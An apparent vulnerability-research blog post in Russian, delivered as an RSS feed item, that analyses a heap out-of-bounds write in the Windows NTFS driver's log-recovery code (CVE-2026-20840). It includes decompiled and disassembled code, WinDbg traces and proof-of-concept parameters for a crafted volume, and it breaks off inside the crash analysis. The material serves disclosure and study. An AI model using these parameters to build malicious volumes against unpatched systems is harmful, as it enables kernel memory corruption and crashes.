<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>PT ESC</title>
	<atom:link href="/feed/index.xml" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description></description>
	<lastBuildDate>Wed, 07 Oct 2026 13:53:34 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.3</generator>

<image>
	<url>/wp-content/uploads/2026/09/cropped-cropped-large_icon-32x32.png</url>
	<title>PT ESC</title>
	<link>/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Out-of-bounds write in ntfs!PageUpdateAnalysis</title>
		<link>/out-of-bounds-write-in-ntfspageupdateanalysis/</link>
		
		<dc:creator><![CDATA[author_vr]]></dc:creator>
		<pubDate>Wed, 07 Oct 2026 11:19:42 +0000</pubDate>
				<category><![CDATA[Vulnerability Research]]></category>
		<category><![CDATA[escvr]]></category>
		<guid isPermaLink="false">/?p=1111&#038;preview=true&#038;preview_id=1111</guid>

					<description><![CDATA[BDU PT CVE 2025-12465 2026-2690 2026-20840 Краткое описание В функции ntfs!PageUpdateAnalysis драйвера NTFS в Microsoft Windows существует уязвимость типа переполнения буфера в куче. Специально сформированный том NTFS может привести к записи за…]]></description>
										<content:encoded><![CDATA[
<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th>BDU</th><th>PT</th><th>CVE</th></tr></thead><tbody><tr><td><a href="https://bdu.fstec.ru/vul/2025-12465">2025-12465</a></td><td><a href="https://dbugs.ptsecurity.com/vulnerability/PT-2026-2690?fts%5Bvalue%5D=CVE-2026-20840">2026-2690</a></td><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20840">2026-20840</a></td></tr></tbody></table></figure>



<h3 class="wp-block-heading">Краткое описание</h3>



<p class="wp-block-paragraph">В функции <code>ntfs!PageUpdateAnalysis</code> драйвера NTFS в Microsoft Windows существует уязвимость типа переполнения буфера в куче. Специально сформированный том NTFS может привести к записи за пределами выделенной области памяти ядра <code>NonPagedPoolNx</code> во время восстановления журнала.</p>



<p class="wp-block-paragraph">Злоумышленник может воспользоваться уязвимостью, заставив уязвимую систему Windows смонтировать том, содержащий вредоносные записи <code>$LogFile</code>. Возникающее в результате повреждение памяти ядра может привести к отказу в обслуживании, повышению привилегий или выполнению произвольного кода в ядре.</p>



<h3 class="wp-block-heading">Ссылка на продукт</h3>



<p class="wp-block-paragraph">Microsoft Windows — <a href="https://www.microsoft.com/windows">https://www.microsoft.com/windows</a></p>



<h3 class="wp-block-heading">CWE</h3>



<p class="wp-block-paragraph"><a href="https://cwe.mitre.org/data/definitions/787.html" data-type="link" data-id="https://cwe.mitre.org/data/definitions/787.html">CWE-787: Out-of-bounds Write</a></p>



<h3 class="wp-block-heading">Детали</h3>



<p class="wp-block-paragraph">NTFS — основная файловая система, используемая Microsoft Windows. Ее журнал метаданных <code>$LogFile</code> содержит записи, которые используются для восстановления согласованного состояния файловой системы после прерванных операций.</p>



<p class="wp-block-paragraph"><code>ntfs!AnalysisPass</code> реализует фазу анализа при восстановлении NTFS после перезапуска, которая предшествует фазам <code>redo</code> и <code>undo</code>. Функция просматривает записи журнала начиная с последней контрольной точки и восстанавливает состояние, необходимое для восстановления, включая таблицы транзакций и измененных страниц (<code>dirty page tables</code>). Эти таблицы отслеживают незавершенные транзакции и страницы метаданных, изменения которых могли не попасть на диск, что позволяет последующим фазам восстановления определить, какие операции необходимо повторить или откатить.</p>



<p class="wp-block-paragraph"><code>ntfs!PageUpdateAnalysis</code> обрабатывает записи обновления страниц во время этой фазы анализа. Стек вызова при монтировании выглядит следующим образом:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; gutter: false; title: ; notranslate">
0: kd&gt; k
 # Child-SP          RetAddr               Call Site
00 ffffcd8a`59bc5e08 fffff804`27ae0f6f     Ntfs!PageUpdateAnalysis
01 ffffcd8a`59bc5e10 fffff804`27b45000     Ntfs!AnalysisPass+0x22b
02 ffffcd8a`59bc5f30 fffff804`27acc3be     Ntfs!NtfsRestartVolume+0xbc
03 ffffcd8a`59bc60a0 fffff804`27ac9f86     Ntfs!NtfsMountVolume+0x1816
04 ffffcd8a`59bc67e0 fffff804`2793e639     Ntfs!NtfsCommonFileSystemControl+0xb6
05 ffffcd8a`59bc68c0 fffff804`9478b7ec     Ntfs!NtfsFspDispatch+0x619
06 ffffcd8a`59bc6a10 fffff804`94931afa     nt!ExpWorkerThread+0x5ec
07 ffffcd8a`59bc6bf0 fffff804`94b4ef84     nt!PspSystemThreadStartup+0x5a
08 ffffcd8a`59bc6c40 00000000`00000000     nt!KiStartSystemThread+0x34

</pre></div>


<p class="wp-block-paragraph">NTFS хранит записи измененных страниц в выделенном блоке <code>RESTART_TABLE</code> в ядерном <code>NonPagedPoolNx</code> пуле. Каждая запись содержит массив номеров логических кластеров (<strong>LCN</strong>), емкость которого определяется размером записи:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: plain; title: ; notranslate">
DIRTY_PAGE_ENTRY (simplified):
  +0x00  AllocatedMarker   DWORD   (-1 indicates an in-use entry)
  +0x04  TargetAttribute   USHORT
  +0x08  LengthOfTransfer  ULONG
  +0x0C  LcnsToFollow      ULONG
  +0x10  StartingVcn       8-byte virtual cluster number
  +0x18  OldestLsn         8-byte log sequence number
  +0x20  LcnsForPage&#x5B;]     Array of 8-byte LCN values

</pre></div>


<p class="wp-block-paragraph">Выделение памяти для таблицы <code>RESTART_TABLE</code>  выполняется в <code>ntfs!InitializeRestartState</code>, когда <code>DirtyPageTable</code> загружается из образа диска.</p>



<p class="wp-block-paragraph">В <code>ntfs!PageUpdateAnalysis</code> после того как функция <code>ntfs!FindDirtyPage</code> возвращает существующую запись, происходит копирование значений <strong>LCN</strong> полученных из записи <code>$LogFile</code>, содержащейся на диске, в запись возвращенную функцией <code>ntfs!FindDirtyPage</code>. Именно здесь происходит запись за пределы памяти выделенной ранее для записей возвращаемых функцией <code>ntfs!FindDirtyPage</code>. </p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
// ntfs!PageUpdateAnalysis
if ( !FindDirtyPage(a4, (unsigned __int16)CurrentLogRecord-&gt;TargetAttribute, CurrentLogRecord-&gt;TargetVcn, &amp;v20) ) {
    ... // entry not found
}
while ( 1 ) {
    result = (unsigned __int16)CurrentLogRecord-&gt;LcnsToFollow;
    if ( v8 &gt;= (unsigned int)result ) // v8 is i
      break;
    v20-&gt;LcnsForPage&#x5B;LODWORD(CurrentLogRecord-&gt;TargetVcn) + v8 - LODWORD(v20-&gt;Vcn)] = CurrentLogRecord-&gt;LcnsForPage&#x5B;v8];
    ++v8;
}
return result;

</pre></div>


<p class="wp-block-paragraph">В исследованном бинарном файле <code>ntfs.sys</code> вышеуказанному декомпилированному фрагменту соответствует следующий дизассемблированный код:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
1c025844c  cmp  esi, eax
1c025844e  jnb  loc_1C025846F
1c0258455  mov  rdx, &#x5B;rsp+...]       ; DirtyPage entry
1c025845a  sub  ecx, &#x5B;rdx+10h]       ; subtract StartingVcn, low 32 bits
1c025845d  add  ecx, &#x5B;r13+18h]       ; add TargetVcn, low 32 bits
1c0258461  mov  rax, &#x5B;r13+r8*8+20h]  ; LogRecord-&gt;LcnsForPage&#x5B;i]
1c0258466  mov  &#x5B;rdx+rcx*8+20h], rax ; unchecked destination write
1c025846b  inc  esi
1c025846d  jmp  short loc_1C0258447

</pre></div>


<p class="wp-block-paragraph">Фактический индекс, по которому осуществляется запись, вычисляется с использованием 32-битной арифметики следующим образом:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
Index = i + TargetVcn - StartingVcn

</pre></div>


<p class="wp-block-paragraph"><code>ntfs!FindDirtyPage</code> считает запись подходящей при выполнении условия: <code>StartingVcn &lt;= TargetVcn &lt; StartingVcn + LcnsToFollow</code>:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
char __fastcall FindDirtyPage(
        My_RESTART_POINTERS *a1,
        int TargetAttribute,
        signed __int64 Vcn,
        My_DIRTY_PAGE_ENTRY **DirtyPage)
{
  My_DIRTY_PAGE_ENTRY *i; // rax
  __int64 v9; // rdx

  if ( !a1-&gt;Table )
    return 0;
  for ( i = (My_DIRTY_PAGE_ENTRY *)NtfsGetFirstRestartTable(a1);
        ;
        i = (My_DIRTY_PAGE_ENTRY *)NtfsGetNextRestartTable((__int64)a1, (__int64)i) )
  {
    if ( !i )
    {
      *DirtyPage = 0LL;
      return 0;
    }
    if ( i-&gt;TargetAttribute == TargetAttribute )
    {
      v9 = i-&gt;Vcn; // v9 is a starting VCN
      if ( Vcn &gt;= v9 &amp;&amp; Vcn &lt; v9 + (unsigned int)i-&gt;LcnsToFollow )
        break;
    }
  }
  *DirtyPage = i;
  return 1;
}

</pre></div>


<p class="wp-block-paragraph">Таким образом проверяется, что начальный кластер находится внутри записи, однако не проверяется, помещается ли в нее весь входящий диапазон. При <code>TargetVcn = StartingVcn + k</code>, цикл выполняет запись по индексам от <code>k</code> до <code>k + LcnsToFollow - 1</code>. Переполнение массива возникает при условии:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
k + LcnsToFollow &gt; ClustersPerPage

</pre></div>


<p class="wp-block-paragraph">Функция <code>ntfs!PageUpdateAnalysis</code> содержит проверку необходимости изменения размера <code>RESTART_TABLE</code>, из которой осуществляется выборка функцией <code>ntfs!FindDirtyPage</code>, но эта проверка выполняется только если <code>LcnsToFollow &gt; ClustersPerPage</code>. При этом смещение k не учитывается. В результате запись, количество <strong>LCN </strong>в которой не превышает номинальную емкость, все равно может привести к переполнению массива назначения.</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
// ntfs!PageUpdateAnalysis
...
if ( Table ) {
    ClustersPerPage = (((unsigned __int64)(unsigned __int16)Table-&gt;EntrySize - 40) &gt;&gt; 3) + 1;
}
else {
    ClustersPerPage = a2-&gt;ClustersPerPage;
    NtfsInitializeRestartTable(8 * ClustersPerPage + 32, 0x20u, a2-&gt;RestartVersion &gt;= 2u, 0, a4);
}
LcnsToFollow = (unsigned __int16)CurrentLogRecord-&gt;LcnsToFollow;
if ( LcnsToFollow &gt; ClustersPerPage ) {
    ClustersPerPage = (unsigned __int16)CurrentLogRecord-&gt;LcnsToFollow;
    NtfsInitializeRestartTable(
      8 * LcnsToFollow + 32,
      (unsigned __int16)a4-&gt;Table-&gt;NumberEntries,
      a2-&gt;RestartVersion &gt;= 2u,
      0,
      &amp;Resource); // resize
    ...
}
...

</pre></div>


<p class="wp-block-paragraph">Ни перед записью в функции <code>ntfs!PageUpdateAnalysis</code>, ни при чтении записей с диска в <code>ntfs!InitializeRestartState</code> отсутствует достаточная валидация данных, более того, <code>ntfs!InitializeRestartState</code> принимает данные  записей <code>DirtyPageTable</code> как есть, если <code>MajorVersion</code> файла <code>$LogFile</code> не равен нулю.</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
// ntfs!InitializeRestartState
...
if ( RestartArea-&gt;DirtyPageTableLength )
  {
    restarted = (My_RESTART_TABLE *)ReadRestartTable(
                                      IrpContext,
                                      Vcb,
                                      RestartArea-&gt;DirtyPageTableLsn,
                                      &amp;Leb,
                                      &amp;RestartAreaLength);
    ExAcquireResourceExclusiveLite(&amp;DirtyPageTable-&gt;Resource, 1u);
    v80 = 1;
    Table = DirtyPageTable-&gt;Table;
    if ( RestartArea-&gt;MajorVersion ) // MajorVersion check
    {
      ExFreePoolWithTag(DirtyPageTable-&gt;Table, 0);
      DirtyPageTable-&gt;Table = 0;
      v26 = RestartAreaLength;
      v27 = (My_RESTART_TABLE *)ExAllocatePoolWithTag((POOL_TYPE)528, RestartAreaLength, &#039;RFtN&#039;);
      DirtyPageTable-&gt;Table = v27;
      memmove(v27, restarted, v26); // data from image has been accepted here
      DirtyPageTable-&gt;Table-&gt;field_A = DirtyPageTable-&gt;Table-&gt;NumberAllocated;
      ExAcquireResourceExclusiveLite(&amp;DirtyPageTable-&gt;Resource, 1u);
      v80 = 1;
      LODWORD(restarted) = 0;
    }
    else
    {
      ...
    }
    ...
}

</pre></div>


<h3 class="wp-block-heading">Proof of Concept</h3>



<p class="wp-block-paragraph">При монтировании специально сформированного тома NTFS выполняет следующие операции:</p>



<ol class="wp-block-list">
<li><code>ntfs!InitializeRestartState</code> считывает сериализованную <code>DirtyPageTable</code> из <code>$LogFile</code>.</li>



<li>Поскольку <code>RESTART_AREA</code> имеет ненулевое значение <code>MajorVersion</code>, вся таблица копируется в новый выделенный буфер <code>NonPagedPoolNx</code>.</li>



<li><code>ntfs!AnalysisPass</code> начинает сканирование с подготовленной контрольной точки.</li>



<li>Следующей обрабатывается специально сформированная запись <code>UpdateResidentValue</code>.</li>



<li>Входящее значение <code>LcnsToFollow</code> равно 8, то есть совпадает с <code>ClustersPerPage</code>, поэтому ветвь изменения размера таблицы не выполняется.</li>



<li><code>ntfs!PageUpdateAnalysis</code> вызывает <code>ntfs!FindDirtyPage</code> с <code>TargetAttribute = 0x18</code> и <code>TargetVcn = 7</code>.</li>



<li><code>ntfs!FindDirtyPage</code> выбирает слот <strong>31</strong>, поскольку его диапазон равен <code>[0, 8)</code> и, следовательно, содержит <strong>VCN 7</strong>.</li>



<li>Уязвимая операция копирования записывает восемь переданных значений <strong>LCN</strong>, начиная с индекса назначения 7.</li>
</ol>



<p class="wp-block-paragraph">В созданной для PoC <code>RESTART_AREA</code> используется <code>MajorVersion = 2</code>. В результате <code>Ntfs!InitializeRestartState</code> выделяет буфер для <code>DirtyPageTable</code> и копирует таблицу непосредственно из образа, не перестраивая ее записи.</p>



<p class="wp-block-paragraph">PoC создает <code>RESTART_TABLE</code> со следующими параметрами:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
EntrySize       = 0x60
NumberEntries   = 32
NumberAllocated = 32

</pre></div>


<p class="wp-block-paragraph">Каждая запись содержит восемь слотов LCN:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
EntrySize = 0x20 + 8 * sizeof(LCN)
          = 0x20 + 8 * 8
          = 0x60

</pre></div>


<p class="wp-block-paragraph">Все 32 записи помечены как занятые, поэтому <code>ntfs!PageUpdateAnalysis</code> не может выбрать или создать свободный слот. Записи с нулевой по 30-ю используют отдельные диапазоны <strong>VCN</strong>, которые не совпадают с диапазоном инициирующей записью. Последняя запись, слот 31, настроена следующим образом:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
AllocatedMarker  = 0xffffffff
TargetAttribute  = 0x18
LengthOfTransfer = 0x1000
StartingVcn      = 0
LcnsToFollow     = 8
LcnsForPage      = {1, 2, 3, 4, 5, 6, 7, 8}

</pre></div>


<p class="wp-block-paragraph">Поскольку слот 31 является последней записью, данные, записываемые за пределами его массива <strong>LCN</strong>, одновременно выходят за пределы всего выделенного блока <code>RESTART_TABLE</code>.</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
sizeof(RESTART_TABLE) + NumberEntries * EntrySize
= 0x18 + 32 * 0x60
= 0xc18 (3096 bytes)

</pre></div>


<p class="wp-block-paragraph">В приведенном ниже фрагменте показано, как <code>DirtyPageTable</code> инициализируется во время выполнения, а также часть данных, соответствующих описанной выше структуре.</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
0: kd&gt; p
rax=0000000000000001 rbx=ffffe180efdf0200 rcx=ffffe180efdefaa8
rdx=0000000000000000 rsi=ffff8f8d3514b7c8 rdi=ffffe180efdeff90
rip=fffff80628a95792 rsp=ffffe180efdefb70 rbp=ffffe180efdf08f0
 r8=ffff8f8d385def01  r9=ffff8f8d385deae0 r10=0000000000000000
r11=ffffe180efdefb68 r12=ffffe180efdefe00 r13=0000000000000000
r14=0000000000000001 r15=ffff8f8d357c81b0
iopl=0         nv up ei pl zr na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
Ntfs!InitializeRestartState+0x51e:
fffff806`28a95792 4539542438      cmp     dword ptr &#x5B;r12+38h],r10d ds:002b:ffffe180`efdefe38=00000c18
...
1: kd&gt; p
rax=0000000000000000 rbx=0000000000000c18 rcx=0000000000000210
rdx=0000000000000c18 rsi=ffff8f8d3514b7c8 rdi=ffffe180efdeff90
rip=fffff80628a95942 rsp=ffffe180efdefb70 rbp=ffffe180efdf08f0
 r8=000000005246744e  r9=0000000000000000 r10=0000000000000000
r11=0000000000000001 r12=ffffe180efdefe00 r13=ffffcd0fd11c0158
r14=0000000000000001 r15=ffff8f8d357c81b0
iopl=0         nv up ei pl zr na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
Ntfs!InitializeRestartState+0x6ce:
fffff806`28a95942 48ff158f0ae7ff  call    qword ptr &#x5B;Ntfs!_imp_ExAllocatePoolWithTag (fffff806`289063d8)] 
...
1: kd&gt; p
rax=ffff8f8d385d03e0 rbx=0000000000000c18 rcx=ffff8f8d385d03e0
rdx=ffffcd0fd11c0158 rsi=ffff8f8d3514b7c8 rdi=ffffe180efdeff90
rip=fffff80628a9595e rsp=ffffe180efdefb70 rbp=ffffe180efdf08f0
 r8=0000000000000c18  r9=0000000000000080 r10=0000000000000000
r11=ffffe180efdefae0 r12=ffffe180efdefe00 r13=ffffcd0fd11c0158
r14=0000000000000001 r15=ffff8f8d357c81b0
iopl=0         nv up ei ng nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040286
Ntfs!InitializeRestartState+0x6ea:
fffff806`28a9595e e8ddf1e1ff      call    Ntfs!memcpy (fffff806`288b4b40)
1: kd&gt; db ffffcd0fd11c0158
ffffcd0f`d11c0158  60 00 20 00 20 00 00 00-00 00 00 00 00 00 00 00  `. . ...........
ffffcd0f`d11c0168  00 00 00 00 00 00 00 00-ff ff ff ff 18 00 00 00  ................
ffffcd0f`d11c0178  00 10 00 00 08 00 00 00-00 10 00 00 00 00 00 00  ................
ffffcd0f`d11c0188  2b 94 a8 00 00 00 00 00-01 00 00 00 00 00 00 00  +...............
ffffcd0f`d11c0198  02 00 00 00 00 00 00 00-03 00 00 00 00 00 00 00  ................
ffffcd0f`d11c01a8  04 00 00 00 00 00 00 00-05 00 00 00 00 00 00 00  ................
ffffcd0f`d11c01b8  06 00 00 00 00 00 00 00-07 00 00 00 00 00 00 00  ................
ffffcd0f`d11c01c8  08 00 00 00 00 00 00 00-ff ff ff ff 18 00 00 00  ................

</pre></div>


<p class="wp-block-paragraph">Запись приводящая к детонации уязвимости, использует redo-операцию <code>UpdateResidentValue</code>, которая передается на обработку в <code>ntfs!PageUpdateAnalysis</code>. Значение некоторых важных полей вы можете видеть ниже:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
RedoOperation   = 0x07
UndoOperation   = 0x02
TargetAttribute = 0x18
TargetVcn       = 7
LcnsToFollow    = 8
ClientDataLength = 0x60
</pre></div>


<p class="wp-block-paragraph">В отладчике видно, как операция обрабатывается в <code>ntfs!PageUpdateAnalysis</code>:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
1: kd&gt; p
rax=ffff8f8d356279e8 rbx=0000000000a8942b rcx=0000000000000000
rdx=ffff8f8d356279e8 rsi=ffff8f8d357c85d8 rdi=00000000000000e0
rip=fffff80628a30f1c rsp=ffffe180efdefe10 rbp=ffffe180efdf08f0
 r8=ffffffffffffff01  r9=ffff8f8d35625000 r10=0000000000000001
r11=ffff8f8d356279b8 r12=ffffe180efdeff90 r13=ffff8f8d357c81b0
r14=ffff8f8d3514b7c8 r15=ffffcd0fd11ca188
iopl=0         nv up ei pl nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040202
Ntfs!AnalysisPass+0x1d8:
fffff806`28a30f1c 410fb70f        movzx   ecx,word ptr &#x5B;r15] ds:002b:ffffcd0f`d11ca188=0007
1: kd&gt; p
rax=ffff8f8d356279e8 rbx=0000000000a8942b rcx=0000000000000007
rdx=ffff8f8d356279e8 rsi=ffff8f8d357c85d8 rdi=00000000000000e0
rip=fffff80628a30f20 rsp=ffffe180efdefe10 rbp=ffffe180efdf08f0
 r8=ffffffffffffff01  r9=ffff8f8d35625000 r10=0000000000000001
r11=ffff8f8d356279b8 r12=ffffe180efdeff90 r13=ffff8f8d357c81b0
r14=ffff8f8d3514b7c8 r15=ffffcd0fd11ca188
iopl=0         nv up ei pl nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040202
Ntfs!AnalysisPass+0x1dc:
fffff806`28a30f20 83f912          cmp     ecx,12h
... // some optimized switch-case related code is here 
0: kd&gt; p
rax=ffff8f8d356279e8 rbx=0000000000a8942b rcx=ffff8f8d3514b7c8
rdx=ffff8f8d357c81b0 rsi=ffff8f8d357c85d8 rdi=00000000000000e0
rip=fffff80628a30f6a rsp=ffffe180efdefe10 rbp=ffffe180efdf08f0
 r8=0000000000a8942b  r9=ffffe180efdeff90 r10=0000000000000001
r11=ffff8f8d356279b8 r12=ffffe180efdeff90 r13=ffff8f8d357c81b0
r14=ffff8f8d3514b7c8 r15=ffffcd0fd11ca188
iopl=0         nv up ei pl zr na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
Ntfs!AnalysisPass+0x226:
fffff806`28a30f6a e8f1080000      call    Ntfs!PageUpdateAnalysis (fffff806`28a31860)

</pre></div>


<p class="wp-block-paragraph">Индексы назначения вычисляются следующим образом:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
Index = i + TargetVcn - StartingVcn = i + 7 - 0 = i + 7

</pre></div>


<p class="wp-block-paragraph">Для <code>i = 0..7</code> получаются следующие индексы:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
7, 8, 9, 10, 11, 12, 13, 14

</pre></div>


<p class="wp-block-paragraph">Индекс 7 является последним допустимым элементом. Индексы с 8 по 14 находятся за пределами записи.</p>



<p class="wp-block-paragraph">Поскольку выбранная запись находится в слоте 31, эти семь значений <strong>LCN</strong> записываются на 56 байт за пределами всей таблицы <code>DirtyPageTable</code>  размером 3096 байт.</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
1: kd&gt; p
rax=0000000000000008 rbx=0000000000a8942b rcx=0000000000000008
rdx=0000000000000001 rsi=0000000000000002 rdi=0000000000000008
rip=fffff80628a3198f rsp=ffffe180efdefc90 rbp=ffffe180efdf08f0
 r8=00000000385d03e0  r9=00000000385d03e0 r10=ffff8f8d385d0f98
r11=0000000000000007 r12=0000000000000018 r13=ffffcd0fd11ca188
r14=ffff8f8d385d03e0 r15=ffffe180efdeff90
iopl=0         nv up ei ng nz ac pe cy
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040297
Ntfs!PageUpdateAnalysis+0x12f:
fffff806`28a3198f 8bd6            mov     edx,esi
1: kd&gt; p
rax=0000000000000008 rbx=0000000000a8942b rcx=0000000000000008
rdx=0000000000000002 rsi=0000000000000002 rdi=0000000000000008
rip=fffff80628a31991 rsp=ffffe180efdefc90 rbp=ffffe180efdf08f0
 r8=00000000385d03e0  r9=00000000385d03e0 r10=ffff8f8d385d0f98
r11=0000000000000007 r12=0000000000000018 r13=ffffcd0fd11ca188
r14=ffff8f8d385d03e0 r15=ffffe180efdeff90
iopl=0         nv up ei ng nz ac pe cy
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040297
Ntfs!PageUpdateAnalysis+0x131:
fffff806`28a31991 8bce            mov     ecx,esi
1: kd&gt; p
rax=0000000000000008 rbx=0000000000a8942b rcx=0000000000000002
rdx=0000000000000002 rsi=0000000000000002 rdi=0000000000000008
rip=fffff80628a31993 rsp=ffffe180efdefc90 rbp=ffffe180efdf08f0
 r8=00000000385d03e0  r9=00000000385d03e0 r10=ffff8f8d385d0f98
r11=0000000000000007 r12=0000000000000018 r13=ffffcd0fd11ca188
r14=ffff8f8d385d03e0 r15=ffffe180efdeff90
iopl=0         nv up ei ng nz ac pe cy
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040297
Ntfs!PageUpdateAnalysis+0x133:
fffff806`28a31993 412b4a10        sub     ecx,dword ptr &#x5B;r10+10h] ds:002b:ffff8f8d`385d0fa8=00000000 // StartingVCN
1: kd&gt; p
rax=0000000000000008 rbx=0000000000a8942b rcx=0000000000000002
rdx=0000000000000002 rsi=0000000000000002 rdi=0000000000000008
rip=fffff80628a31997 rsp=ffffe180efdefc90 rbp=ffffe180efdf08f0
 r8=00000000385d03e0  r9=00000000385d03e0 r10=ffff8f8d385d0f98
r11=0000000000000007 r12=0000000000000018 r13=ffffcd0fd11ca188
r14=ffff8f8d385d03e0 r15=ffffe180efdeff90
iopl=0         nv up ei pl nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040202
Ntfs!PageUpdateAnalysis+0x137: // actually it is i (index) + TargetVCN
fffff806`28a31997 41034d18        add     ecx,dword ptr &#x5B;r13+18h] ds:002b:ffffcd0f`d11ca1a0=00000007 // TargetVCN
1: kd&gt; p
rax=0000000000000008 rbx=0000000000a8942b rcx=0000000000000009
rdx=0000000000000002 rsi=0000000000000002 rdi=0000000000000008
rip=fffff80628a3199b rsp=ffffe180efdefc90 rbp=ffffe180efdf08f0
 r8=00000000385d03e0  r9=00000000385d03e0 r10=ffff8f8d385d0f98
r11=0000000000000007 r12=0000000000000018 r13=ffffcd0fd11ca188
r14=ffff8f8d385d03e0 r15=ffffe180efdeff90
iopl=0         nv up ei pl nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040206
Ntfs!PageUpdateAnalysis+0x13b:    // read data that comes from image
fffff806`28a3199b 498b44d520      mov     rax,qword ptr &#x5B;r13+rdx*8+20h] ds:002b:ffffcd0f`d11ca1b8=4141414100000002
1: kd&gt; p
rax=4141414100000002 rbx=0000000000a8942b rcx=0000000000000009 // rcx is i (index)
rdx=0000000000000002 rsi=0000000000000002 rdi=0000000000000008
rip=fffff80628a319a0 rsp=ffffe180efdefc90 rbp=ffffe180efdf08f0
 r8=00000000385d03e0  r9=00000000385d03e0 r10=ffff8f8d385d0f98
r11=0000000000000007 r12=0000000000000018 r13=ffffcd0fd11ca188
r14=ffff8f8d385d03e0 r15=ffffe180efdeff90
iopl=0         nv up ei pl nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040206
Ntfs!PageUpdateAnalysis+0x140:
fffff806`28a319a0 498944ca20      mov     qword ptr &#x5B;r10+rcx*8+20h],rax ds:002b:ffff8f8d`385d1000=????????????????

</pre></div>


<p class="wp-block-paragraph">Монтирование сгенерированного VHD, в системе с уязвимой версией <code>ntfs.sys,</code> приводит к повреждению памяти происходящему в результате записи за пределами буфера в функции <code>Ntfs!PageUpdateAnalysis</code>:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate">
1: kd&gt; !analyze -v -force
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffff8f8d385d1000, memory referenced.
Arg2: 0000000000000002, X64: bit 0 set if the fault was due to a not-present PTE.
    bit 1 is set if the fault was due to a write, clear if a read.
    bit 3 is set if the processor decided the fault was due to a corrupted PTE.
    bit 4 is set if the fault was due to attempted execute of a no-execute PTE.
    - ARM64: bit 1 is set if the fault was due to a write, clear if a read.
    bit 3 is set if the fault was due to attempted execute of a no-execute PTE.
Arg3: fffff80628a319a0, If non-zero, the instruction address which referenced the bad memory
    address.
Arg4: 0000000000000002, (reserved)

Debugging Details:
------------------


KEY_VALUES_STRING: 1

    Key  : AV.PTE
    Value: Invalid

    Key  : AV.Page.Virtual
    Value: 0xffff8f8d385d0000

    Key  : AV.Type
    Value: Write

    Key  : Analysis.CPU.mSec
    Value: 4500

    Key  : Analysis.Elapsed.mSec
    Value: 9710

    Key  : Analysis.IO.Other.Mb
    Value: 14

    Key  : Analysis.IO.Read.Mb
    Value: 15

    Key  : Analysis.IO.Write.Mb
    Value: 201

    Key  : Analysis.Init.CPU.mSec
    Value: 97484

    Key  : Analysis.Init.Elapsed.mSec
    Value: 11291658

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 265

    Key  : Analysis.Version.DbgEng
    Value: 10.0.29617.1000

    Key  : Analysis.Version.Description
    Value: 10.2604.29.1 amd64fre

    Key  : Analysis.Version.Ext
    Value: 1.2604.29.1

    Key  : Bugcheck.Code.KiBugCheckData
    Value: 0x50

    Key  : Bugcheck.Code.LegacyAPI
    Value: 0x50

